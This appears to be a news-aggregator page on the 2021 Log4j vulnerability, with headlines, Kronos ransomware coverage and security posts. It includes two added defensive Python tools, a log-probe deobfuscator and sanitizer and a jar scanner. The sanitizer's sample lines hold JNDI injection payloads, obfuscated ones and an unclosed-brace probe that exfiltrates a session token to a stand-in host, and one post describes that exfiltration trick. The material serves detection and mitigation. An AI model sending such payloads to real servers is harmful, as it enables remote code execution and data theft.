CISA Director Jen Easterly says the Log4j flaw likely affects hundreds of millions of devices and may be the most serious bug she has seen in her career
Cybersecurity and Infrastructure Security Agency Director Jen Easterly told industry leaders in a phone briefing Monday that a vulnerability …
CyberScoop · Tim Starks
Related Coverage
- The Log4J Vulnerability Will Haunt the Internet for Years Wired · Lily Hay Newman
- Technical Advisory: Zero-day critical vulnerability in Log4j2 exploited in the wild Business Insights … · Martin Zugec
- Ten families of malicious samples are spreading using the Log4j2 vulnerability Now 360 · Ghost
- US warns hundreds of millions of devices at risk from newly revealed software vulnerability CNN · Sean Lyngaas
- Ransomware, Trojans, DDoS Malware and Crypto-Miners Delivered in Log4Shell Attacks SecurityWeek · Eduard Kovacs
- Log4Shell Hell: anatomy of an exploit outbreak Sophos News · Sean Gallagher
- Protect Yourself Against The Apache Log4j Vulnerability Check Point Software · Jacinta Paul
- Log4j could be the most serious security threat ever seen, CISA head warns TechRadar
- CISA Director Says Log4j Flaw Affects Hundreds Of Millions Of Devices, May Be Most Serious Bug She Has Seen; + more news DSLreports
- Log4j flaw puts hundreds of millions of devices at risk, warns cybersecurity agency ZDNet · Liam Tung
- Software vulnerability expected to persist, possibly for months Livemint
- Hackers Exploit Log4j Vulnerability to Infect Computers with Khonsari Ransomware The Hacker News · Ravie Lakshmanan
- BlueTeam CheatSheet * Log4Shell* | Last updated: 2021-12-12 2204 UTC Gist · SwitHak
- Log4j may be the worst vulnerability yet, says Department of Homeland Security AppleInsider · Amber Neely
- Log4J vulnerability: Businesses must act to patch affected systems Tech Monitor · Claudia Glover
- Agencies Must Fix Newly Cataloged Vulnerabilities by Christmas Eve Nextgov
- An update on the Apache Log4j CVE-2021-44228 vulnerability IBM PSIRT · Ben Beetle
- Log4Shell Is Spawning Even Nastier Mutations Threatpost · Lisa Vaas
- Critical Log4Shell security flaw lets hackers compromise vulnerable servers TechRepublic · Lance Whitney
- Flaw prompts 100 hack attacks a minute, security company says BBC
- Log4j: List of vulnerable products and vendor advisories BleepingComputer · Ionut Ilascu
- Cyber experts express growing alarm over Apache vulnerability The Hill · Maggie Miller
- Sanitizing Cloudflare Logs to protect customers from the Log4j vulnerability The Cloudflare Blog · Jon Levine
- Google Ads Not Affected By Log4j 2 Vulnerability Search Engine Roundtable · Barry Schwartz
- Log4Shell vulnerability: What we know so far WeLiveSecurity · Rene Holt
- The Log4j vulnerability and its impact on software supply chain security Snyk
- Log4Shell in broad use: Fukushima moment for cybersecurity cybernews.com
- The Log4j software bug could put your favorite sites at risk: What you need to know CNET · Bree Fowler
- Hackers target 40% of corporate networks through Log4J flaw Financial Times · Hannah Murphy
- UKG expects weeks of downtime after ransomware attack The Record · Catalin Cimpanu
- A division of Virginia's General Assembly is dealing with ransomware attack Washington Post
- Christmas bonuses could be delayed after HR and payroll giant Kronos hit by ransomware attack TechRadar
- Kronos services knocked offline by ransomware attack cloudpro.co.uk · Connor Jones
- Ransomware strikes workflow solutions provider Kronos via suspected Log4shell exploit SiliconANGLE · Duncan Riley
- Kronos, major HR and payroll service provider, hit with ransomware, warns of a long outage cybernews.com · Vilius Petkauskas
- Payroll Service Kronos Offline After Ransomware Attack PYMNTS.com
- Timekeeping biz Kronos hit by ransomware and warns customers to engage biz continuity plans The Register · Gareth Corfield
- Christmas Payroll Fears After Ransomware Hits Software Provider infosecurity-magazine.com · Phil Muncaster
- Kronos Ransomware Outage Drives Widespread Payroll Chaos Threatpost · Tara Seals
- Ransomware attack takes down HR and payroll company software, potentially for several weeks USA Today · Michelle Shen
Discussion
- @marcioalm (Márcio Almeida) on X: Just added support for LDAP Serialized Payloads in the JNDI-Exploit-Kit. This attack path works in *ANY* Java version as long as the classes used in the serialized payload are in the application classpath. Do not rely on your Java version being up-to-date and update your log4j ASAP! …
- @tomanthonyseo (Tom Anthony) on X: Interesting Log4j payload I discovered: simply omit the closing brace }, and now you will potentially get a bunch of data exfiltrated to your server until the next } appears in that data. Had it work on a FANG target... https://twitter.com/...
- @eastdakota on X: @Cloudflare We're seeing over 1,000 attempted exploits of the #Log4J vulnerability per second. Our WAF rules are protecting customers directly, but sanitizing logs helps ensure downstream log processing isn't impacted. https://blog.cloudflare.com/ ...
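The two techniques in the posts above, the unclosed-brace probe and the log sanitization that stops such probes from firing in a log4j-based consumer downstream, as an added Python example that is not from the original page or from any of the quoted authors. It models the substitution a probe author expects log4j to perform (`${lower:...}`, `${upper:...}` and the `:-` default-value form) so that obfuscated probes collapse to their plain `${jndi:...}` shape, shows why a lookup that is closed only by a later, unrelated `}` drags the intervening log fields into the outbound request, and neutralizes the trigger before the line is stored. The log lines, addresses, session token and replacement token are constructed for the example.

```python
import re

# Innermost "${...}" whose body holds no further "${". The body may still hold a
# bare "{" or "$" (a JSON brace, a price), which is exactly how an unclosed probe
# swallows unrelated fields up to the next "}" in the same log message.
_INNERMOST = re.compile(r"\$\{((?:(?!\$\{)[^}])*)\}")
_JNDI_OPEN = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _attacker_expected(body: str):
    """Resolve one lookup body the way a probe author expects log4j to.
    Returns None for bodies that must stay as written (jndi, unknown prefixes)."""
    if ":-" in body:                       # ${env:NOPE:-j} or ${::-j} -> default "j"
        return body.split(":-", 1)[1]
    prefix, _, rest = body.partition(":")
    if prefix.strip().lower() == "lower":  # ${lower:J} -> j
        return rest.lower()
    if prefix.strip().lower() == "upper":  # ${upper:j} -> J
        return rest.upper()
    return None                            # ${jndi:...}, ${date:...}, ... left alone


def resolve_lookups(text: str, max_rounds: int = 32) -> str:
    """Collapse innermost lower/upper/default lookups round by round until the
    text stops changing, so obfuscated probes converge on plain ${jndi:...}."""
    for _ in range(max_rounds):
        changed = False

        def repl(m):
            nonlocal changed
            out = _attacker_expected(m.group(1))
            if out is None:
                return m.group(0)
            changed = True
            return out

        text = _INNERMOST.sub(repl, text)
        if not changed:
            break
    return text


def analyze(line: str) -> dict:
    """Classify one log line. 'jndi_bodies' holds the text each closed jndi lookup
    would send to the attacker's server; 'unterminated' marks a "${" with no "}"
    anywhere after it (it resolves nothing on its own, but fires the moment a
    later field in the same message supplies a "}")."""
    resolved = resolve_lookups(line)
    bodies = [m.group(1) for m in _INNERMOST.finditer(resolved)
              if m.group(1).lstrip().lower().startswith("jndi:")]
    last_open = resolved.rfind("${")
    unterminated = last_open != -1 and "}" not in resolved[last_open:]
    return {
        "suspicious": bool(bodies) or bool(_JNDI_OPEN.search(resolved)),
        "jndi_bodies": bodies,
        "unterminated": unterminated,
        "resolved": resolved,
    }


def sanitize(line: str) -> str:
    """Neutralize the lookup trigger before the line is stored or forwarded, so a
    log4j-based consumer downstream cannot be exploited by replaying the log.
    Replacing "${" with "x{" is this example's own choice; any rewrite that breaks
    the "${" pair works, and applying it to the raw line kills nested forms too."""
    return line.replace("${", "x{")


# Constructed sample lines (RFC 5737 documentation addresses), not real traffic.
SAMPLE_LINES = [
    '198.51.100.20 - - "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '198.51.100.21 - - "GET / HTTP/1.1" 200 "${jndi:ldap://198.51.100.7:1389/a}"',
    '198.51.100.22 - - "GET / HTTP/1.1" 200 '
    '"${${lower:j}ndi:${env:NOPE:-l}${::-d}ap://198.51.100.7/a}"',
    # Unclosed probe: the "}" that finally closes it belongs to an unrelated JSON
    # field, so the session token and tenant name ride to the attacker in the URL.
    '198.51.100.23 - - "GET / HTTP/1.1" 200 "${jndi:ldap://198.51.100.7/x/" '
    'session=d3adb33f extra={"tenant":"acme"}',
    '198.51.100.24 - - "GET / HTTP/1.1" 200 "${jndi:ldap://198.51.100.7/x/"',
]


def scan(lines):
    """Return (line, analysis) for every suspicious line."""
    hits = []
    for ln in lines:
        info = analyze(ln)
        if info["suspicious"]:
            hits.append((ln, info))
    return hits


if __name__ == "__main__":
    for ln, info in scan(SAMPLE_LINES):
        print(info["unterminated"], info["jndi_bodies"] or info["resolved"])
```

Only `lower`, `upper` and the `:-` default form are collapsed here; a probe built from a lookup this resolver does not know (for example `${date:...}` with a quoted literal) stays opaque, so treat the output as a triage aid rather than a complete filter and keep the sanitizer, which does not depend on recognizing the obfuscation, in front of any log4j-based log pipeline.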
- @matthew_d_green (Matthew Green) on X: What percentage of Java software can't be patched because the companies that developed it have lost the source code?
- @timstarks (Tim Starks) on X: CISA's recently concluded phone briefing with industry on the Log4j vulnerability sounded some pretty dire notes. Here's what Easterly et al told critical infrastructure folk. https://www.cyberscoop.com/...
- @tonyajoriley (Tonya Riley) on X: .@timstarks got the inside scoop on CISA's call with industry leaders about #log4j today. CISA is expecting hundreds of millions of devices are likely to be affected. Cannot overstate the seriousness of this. https://www.cyberscoop.com/...
- @chriseng (Chris Eng) on X: As we were starting to hear over the weekend, updating the JVM version is no longer an effective mitigation. Continue focusing on patching the root cause! https://twitter.com/...
- @matthew_d_green (Matthew Green) on X: Does anyone know how the log4j bug leaked out? Per @TaliaRinger it was reported to the project on 12/6 and then was found in the wild a few days later. Coincidence? Leaked disclosure? Found in the wild?
- @gossithedog (Kevin Beaumont) on X: For those who used Java versions as a mitigation (including some security vendors in their advisories): it isn't a mitigation. https://twitter.com/...
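Both of the posts above make the same point: the JVM version is not the control, the log4j-core jar is. Added here, not from the page or from either author, is a Python scanner that locates log4j-core inside jars, wars and ears (including archives nested inside archives, such as WEB-INF/lib), reads the version from its Maven pom.properties and checks whether JndiLookup.class is still present, since removing that class is the mitigation that holds regardless of which JVM runs the code. The sample archives are constructed in memory (the class entries are stand-in bytes, not real log4j classes); 2.15.0 was the first release that closed CVE-2021-44228 and later advisories raised the floor, so the threshold is a parameter.

```python
import io
import re
import zipfile

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
NESTED = (".jar", ".war", ".ear", ".zip")
# 2.15.0 was the first release that closed CVE-2021-44228; later advisories raised
# the floor, so callers pass whatever minimum they currently require.
DEFAULT_MIN_VERSION = (2, 15, 0)


def parse_version(text: str) -> tuple:
    """'2.14.1' -> (2, 14, 1); '2.3' -> (2, 3, 0); pre-release suffixes are ignored."""
    nums = [int(n) for n in re.findall(r"\d+", text)][:3]
    return tuple(nums + [0] * (3 - len(nums)))


def scan_archive(data: bytes, path: str, min_version=DEFAULT_MIN_VERSION, results=None) -> list:
    """Walk one archive and every archive nested inside it (WEB-INF/lib, fat jars,
    ears), recording each log4j-core found: its version from the Maven metadata,
    whether JndiLookup.class is still present, and the resulting verdict."""
    if results is None:
        results = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = sorted(zf.namelist())
        version = None
        if POM_PROPS in names:
            for line in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
                if line.startswith("version="):
                    version = line.split("=", 1)[1].strip()
        has_jndi = JNDI_CLASS in names
        if version is not None or has_jndi:
            # No JndiLookup.class means the lookup cannot run, whatever the version.
            # A present class with unknown version (shaded jar, metadata stripped)
            # is reported as vulnerable: the scanner cannot prove otherwise.
            vulnerable = has_jndi and (version is None or parse_version(version) < min_version)
            results.append({"path": path, "version": version,
                            "jndi_lookup_present": has_jndi, "vulnerable": vulnerable})
        for name in names:
            if name.lower().endswith(NESTED):
                try:
                    scan_archive(zf.read(name), f"{path}!/{name}", min_version, results)
                except zipfile.BadZipFile:
                    pass  # not a real archive despite the suffix
    return results


def scan_file(filename: str, min_version=DEFAULT_MIN_VERSION) -> list:
    """Scan an archive on disk; the path prefix in each hit is the file name."""
    with open(filename, "rb") as fh:
        return scan_archive(fh.read(), filename, min_version)


def _make_zip(entries: dict) -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in entries.items():
            zf.writestr(name, content)
    return buf.getvalue()


def build_samples() -> dict:
    """Constructed archives for the demo: the .class entries are stand-in bytes,
    not real log4j classes, and the versions are chosen to cover each verdict."""
    stub_class = b"\xca\xfe\xba\xbe"
    old_core = _make_zip({POM_PROPS: "version=2.14.1\nartifactId=log4j-core\n",
                          JNDI_CLASS: stub_class})
    stripped_core = _make_zip({POM_PROPS: "version=2.14.1\n"})           # class deleted
    fixed_core = _make_zip({POM_PROPS: "version=2.15.0\n", JNDI_CLASS: stub_class})
    shaded_unknown = _make_zip({JNDI_CLASS: stub_class})                  # no metadata
    app_war = _make_zip({
        "WEB-INF/lib/log4j-core-2.14.1.jar": old_core,
        "WEB-INF/lib/other-lib.jar": _make_zip({"META-INF/MANIFEST.MF": "Manifest-Version: 1.0\n"}),
    })
    return {"old.jar": old_core, "stripped.jar": stripped_core, "fixed.jar": fixed_core,
            "shaded.jar": shaded_unknown, "app.war": app_war}


if __name__ == "__main__":
    for name, blob in build_samples().items():
        for hit in scan_archive(blob, name):
            print(f'{hit["path"]}: version={hit["version"]} '
                  f'jndi_lookup={hit["jndi_lookup_present"]} vulnerable={hit["vulnerable"]}')
```

The verdict deliberately ignores the JVM: an old log4j-core with JndiLookup.class present is reported vulnerable on any Java version, and the only two things that change the answer are a fixed version or the class being gone. Run it over every archive an application ships with, not just the ones named log4j, since fat jars and shaded builds carry the class without the file name.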
- @bushidotoken on X: The #Kinsing and #Muhstik cryptomining botnets are some of the first to exploit any new RCE vulnerability: this time it's Log4j & Log4Shell. Those two names have cropped up for several major RCEs this year; they've actually become one way to tell how bad a new RCE is.
- @girlgerms on X: Some great information and guidance from Microsoft around Log4j: https://msrc-blog.microsoft.com/ ... https://www.microsoft.com/...
- @p_malynin (Pavlo Malynin) on X: The #log4j exploit is so awesome I had to log onto my twitter for the first time in years. I have found the perfect weapon to fight iMessage and SMS scammers #Log4Shell https://twitter.com/...
- @eastdakota on X: Earliest evidence we've found so far of #Log4J exploit is 2021-12-01 04:36:50 UTC. That suggests it was in the wild at least 9 days before publicly disclosed. However, we don't see evidence of mass exploitation until after public disclosure.
- @gossithedog (Kevin Beaumont) on X: This is another mitigation people are putting in, but it depends on a recent version of Log4j to work. There's a lot of placebo-effect mitigations happening with Log4Shell, sadly. Even some vendors have issued mitigations that don't actually work. https://twitter.com/...
- @rover829 (Vincent Lee) on X: Bloomberg: The first person to alert members of an open-source software project who frantically worked to fix a fatal flaw in a widely used software tool was a cloud-security team employee at Alibaba. https://twitter.com/...
- @williamturton (William Turton) on X: “We promise to keep it secret until your official release version comes out. Please hurry up.” https://www.bloomberg.com/...
- @soychicka (Random Facts Girl) on X: Who would ever think that a tool with such polished branding could be the weak link in the collapse of teh innerwebs? https://arstechnica.com/... https://twitter.com/...
- @jamietarabay (Jamie Tarabay) on X: “In the frantic time since the flaw was publicly disclosed, researchers have concluded that the vulnerability had existed in #Log4j since September 2013, apparently unknown to its vast universe of users.” #Apache https://twitter.com/...
- @seldo (Laurie Voss) on X: Turns out the entire world did not manage to patch every single Java application on earth over the weekend, so things are still on fire in Java land: https://www.bleepingcomputer.com/ ...
- @_jfeldman (Jonathan Feldman) on X: Alright #kronos—buckle up y'all. It is indeed #ransomware. “we strongly recommend that you evaluate and implement alternative business continuity protocols” https://twitter.com/...
- @campuscodi (Catalin Cimpanu) on X: Payroll and HR software maker UKG expects weeks of downtime after ransomware attack. One of their customers told me today they are unable to process salaries ahead of the Xmas holiday, so very bad time to be down 🥶 https://therecord.media/... https://twitter.com/...
- @uuallan on X: This Kronos/Telestaff ransomware attack is having a wide-ranging impact. I've received several complaints from several companies that can't process payroll this morning. https://twitter.com/...
- @jasonlk on X: Woah -> “Kronos outage will last several >weeks<. Firm advises customers to use other services.” https://twitter.com/...
- @ldignan (Larry Dignan) on X: This is such a bad look for a vendor that keeps time and processes payroll. Kronos hit with ransomware, warns of data breach and ‘several week’ outage https://www.zdnet.com/... via @ZDNet & @jgreigj https://www.techmeme.com/... and community link. https://community.kronos.com/ .…